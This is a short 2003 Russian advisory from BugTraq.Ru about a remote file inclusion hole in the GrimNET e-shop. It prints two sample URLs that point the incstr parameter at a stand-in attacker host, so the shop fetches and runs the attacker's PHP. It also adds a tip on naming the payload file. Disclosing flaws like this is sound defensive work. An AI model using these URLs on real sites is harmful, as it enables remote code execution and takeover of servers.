BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2003/10/37.html

Выполнение произвольного PHP-кода в GrimNET e-shop
dl // 20.10.03 22:37
Не представляю, насколько актуальна эта самая корейская система электронных магазинов, но дырка любопытна и сама по себе.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/37.html]

Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.

Источник: NivaX, http://www.web-hack.ru    
теги: .net  |  предложить новость  |  обсудить  |  все отзывы (0) [4160]
назад «  » вперед

аналогичные материалы
Взлом 180 тысяч ASP.Net сайтов через sql-инъекции // 21.10.11 00:22
Плагин MS ставил под удар пользователей FireFox // 17.10.09 01:57
Октябрьские обновления от MS // 14.10.09 00:19
Августовские обновления от MS // 11.08.09 22:40
Microsoft представила новый язык программирования // 11.05.09 21:10
Обход защиты памяти в Vista // 12.08.08 02:11
Эти страшные NULL-pointerы // 05.05.08 22:24
 
последние новости
Зловреды выбирают Lisp и Delphi // 30.03.25 23:26
Уязвимости в Mongoose ставят под удар MongoDB // 20.02.25 18:23
По роутерам Juniper расползается бэкдор, активирующийся "волшебным пакетом" // 27.01.25 17:33
С наступающим // 31.12.24 23:59
Microsoft обещает радикально усилить безопасность Windows в следующем году // 19.11.24 17:09
Ядро Linux избавляется от российских мейнтейнеров // 23.10.24 23:10
20 лет Ubuntu // 20.10.24 19:11





  Copyright © 2001-2025 Dmitry Leonov Design: Vadim Derkach